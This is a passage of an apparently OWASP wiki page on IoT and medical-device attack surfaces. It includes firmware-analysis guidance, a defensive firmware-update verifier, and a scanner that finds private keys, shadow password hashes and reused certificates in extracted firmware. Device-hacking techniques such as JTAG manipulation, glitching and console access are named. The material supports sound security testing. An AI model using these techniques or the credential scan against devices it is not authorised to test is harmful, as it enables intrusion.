** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known vulnerabilities (Heartbleed, Shellshock, outdated PHP versions, etc.)<br />
* Security-related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Common countermeasures include custom bootloaders that prevent entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
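As an added example (not code from the OWASP project), the following Python script applies the update-mechanism checks from the table above to a staged firmware update: it rejects a world-writable update location, a manifest that fails its authenticity check, an image that does not match the manifest hash, and a downgrade or replay. The manifest layout, the HMAC tag standing in for a real public-key signature, and the file names are constructed assumptions, not any vendor's format.<br />

```python
"""Added example (not OWASP project code): checks a staged firmware update
against the update-mechanism weaknesses in the table above: unsigned or
unverified updates, a world-writable update location, and downgrades.
The manifest layout, the HMAC tag (standing in for a real signature) and
the file names are constructed assumptions, not any vendor's format."""
import hashlib
import hmac
import json
import os
import stat
import tempfile


class UpdateRejected(Exception):
    """Raised when the staged update fails any check."""


def staging_dir_is_private(path):
    """True when the update directory is not group- or world-writable."""
    mode = os.stat(path).st_mode
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def manifest_tag(key, body):
    """Authenticity tag over the manifest body (HMAC-SHA256, hex).
    A production device would verify a public-key signature instead."""
    return hmac.new(key, body, hashlib.sha256).hexdigest().encode()


def write_package(staging, key, version, image):
    """Write a constructed update package: image plus a tagged manifest."""
    with open(os.path.join(staging, "fw.bin"), "wb") as f:
        f.write(image)
    body = json.dumps({"version": version,
                       "sha256": hashlib.sha256(image).hexdigest()}).encode()
    with open(os.path.join(staging, "manifest.json"), "wb") as f:
        f.write(body + b"\n" + manifest_tag(key, body))


def verify_update(staging, key, installed_version):
    """Run every check; return the manifest only if the update is acceptable."""
    # "Update location writable": anyone who can write here can swap the image.
    if not staging_dir_is_private(staging):
        raise UpdateRejected("update location is writable by other users")
    with open(os.path.join(staging, "manifest.json"), "rb") as f:
        body, _, tag = f.read().rpartition(b"\n")
    # "Updates not signed" / "Update authentication": reject a forged manifest.
    if not hmac.compare_digest(manifest_tag(key, body), tag.strip()):
        raise UpdateRejected("manifest authenticity check failed")
    manifest = json.loads(body)
    # "Firmware downgrade possibility": never accept an older or equal version.
    if manifest["version"] <= installed_version:
        raise UpdateRejected("downgrade or replay of an installed version")
    # "Update verification": the image must match the authenticated hash.
    with open(os.path.join(staging, "fw.bin"), "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    if not hmac.compare_digest(digest, manifest["sha256"]):
        raise UpdateRejected("image hash does not match manifest")
    return manifest


def outcome(staging, key, installed_version):
    """Return 'accepted' or the rejection reason (helper for the demo)."""
    try:
        verify_update(staging, key, installed_version)
        return "accepted"
    except UpdateRejected as e:
        return str(e)


def demo():
    """Exercise the checks on a constructed package; returns each outcome."""
    key = b"constructed-demo-key-not-a-real-secret"
    image = b"\x7fELF-constructed-firmware-image"
    staging = tempfile.mkdtemp()          # created with mode 0700: private
    write_package(staging, key, version=5, image=image)
    results = {"valid": outcome(staging, key, 4),
               "downgrade": outcome(staging, key, 5)}
    # Forged manifest: version/hash rewritten without knowledge of the key.
    forged = json.dumps({"version": 9, "sha256": "00" * 32}).encode()
    with open(os.path.join(staging, "manifest.json"), "wb") as f:
        f.write(forged + b"\n" + b"ff" * 32)
    results["forged"] = outcome(staging, key, 4)
    write_package(staging, key, version=5, image=image)  # restore good package
    # Tampered image: bytes changed after the manifest was produced.
    with open(os.path.join(staging, "fw.bin"), "ab") as f:
        f.write(b"\x00")
    results["tampered"] = outcome(staging, key, 4)
    # World-writable staging directory.
    os.chmod(staging, 0o777)
    results["writable"] = outcome(staging, key, 4)
    os.chmod(staging, 0o700)
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```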
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security-related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way for people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS protocol versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH are protected by a strong, non-default password<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing the device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
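<br />
The table above says what to look for once a filesystem has been extracted (hardcoded credentials, encryption key exposure, the same certificate reused across devices) but not how. The script below is an added example of a file system analysis pass; it is not part of the OWASP project or of Firmwalker. It walks an extracted root, flags PEM private keys, lists /etc/shadow accounts that still carry a usable password hash, and fingerprints every PEM certificate so that one baked into several firmware images shows up when the results are compared. The two firmware trees, the shadow entries and the certificate blob it scans are constructed inline, and the certificate is a placeholder rather than real DER. Checking expiry dates would need an X.509 parser (for example <code>openssl x509 -noout -dates</code>) and is left out.<br />

```python
"""Added example: scan extracted firmware root filesystems for the artifacts
listed under "Device Firmware Vulnerabilities". Not part of the OWASP project
or of Firmwalker; the sample trees, shadow entries and certificate blob are
constructed below (the certificate is a placeholder, not real DER)."""
import base64
import hashlib
import os
import re
import tempfile

PEM_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----")
PEM_CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
MAX_BYTES = 4 * 1024 * 1024  # skip kernels and packed blobs; text keys live in small files
LOCKED = ("*", "!", "!!")    # shadow password fields that mean "no usable password"


def _read(path):
    """Return file bytes, or b"" for symlinks, oversized files and unreadable paths."""
    try:
        if os.path.islink(path) or os.path.getsize(path) > MAX_BYTES:
            return b""
        with open(path, "rb") as fh:
            return fh.read()
    except OSError:
        return b""


def cert_fingerprints(data):
    """SHA-256 fingerprint (over the decoded DER) of every PEM certificate in data."""
    fps = []
    for m in PEM_CERT_RE.finditer(data):
        try:
            der = base64.b64decode(b"".join(m.group(1).split()), validate=True)
        except ValueError:
            continue
        fps.append(hashlib.sha256(der).hexdigest())
    return fps


def shadow_accounts_with_hashes(shadow_text):
    """Accounts whose password field holds a hash rather than a lock marker."""
    accounts = []
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2 and parts[1] and parts[1] not in LOCKED and not parts[1].startswith("!"):
            accounts.append(parts[0])
    return accounts


def scan_firmware_root(root):
    """Walk one extracted root; return private-key paths, shadow accounts and cert fingerprints."""
    findings = {"private_keys": [], "shadow_accounts": [], "certs": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            data = _read(path)
            if PEM_KEY_RE.search(data):
                findings["private_keys"].append(rel)
            for fp in cert_fingerprints(data):
                findings["certs"].setdefault(fp, []).append(rel)
            if rel in ("etc/shadow", "etc/shadow-"):
                findings["shadow_accounts"] += shadow_accounts_with_hashes(data.decode("utf-8", "replace"))
    return findings


def shared_certificates(results_by_image):
    """Fingerprints seen in more than one image: one certificate baked into a whole product line."""
    seen = {}
    for image, res in results_by_image.items():
        for fp in res["certs"]:
            seen.setdefault(fp, set()).add(image)
    return {fp: sorted(imgs) for fp, imgs in seen.items() if len(imgs) > 1}


# --- constructed sample data (not from any real device) ----------------------
FAKE_DER = b"constructed placeholder, not a real X.509 certificate"
PEM_CERT = "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % base64.b64encode(FAKE_DER).decode()
PEM_KEY = "-----BEGIN RSA PRIVATE KEY-----\nconstructed-key-material\n-----END RSA PRIVATE KEY-----\n"


def build_sample_images(base):
    """Two constructed firmware roots that ship the same server certificate and key."""
    roots = {}
    for name, extra_user in (("camera_v1.0", "admin"), ("camera_v1.1", "support")):
        root = os.path.join(base, name)
        os.makedirs(os.path.join(root, "etc", "ssl"))
        with open(os.path.join(root, "etc", "ssl", "server.pem"), "w") as fh:
            fh.write(PEM_CERT + PEM_KEY)
        with open(os.path.join(root, "etc", "shadow"), "w") as fh:
            fh.write("root:$1$abcd$constructedhash:17000:0:99999:7:::\n")
            fh.write("daemon:*:17000:0:99999:7:::\n")
            fh.write("%s:$5$efgh$constructedhash:17000:0:99999:7:::\n" % extra_user)
        roots[name] = root
    return roots


def demo():
    """Scan both sample images and report the certificate they share."""
    with tempfile.TemporaryDirectory() as base:
        results = {name: scan_firmware_root(root) for name, root in build_sample_images(base).items()}
    return results, shared_certificates(results)


if __name__ == "__main__":
    per_image, shared = demo()
    for image, res in per_image.items():
        print(image, "keys:", res["private_keys"], "accounts:", res["shadow_accounts"])
    print("certificates shared across images:", shared)
```

Point <code>scan_firmware_root</code> at the directory binwalk or the Firmware Modification Kit extracted and compare several images of the same product with <code>shared_certificates</code>; a fingerprint that appears in every image is the "same certificate used on multiple devices" finding from the table.<br />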
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
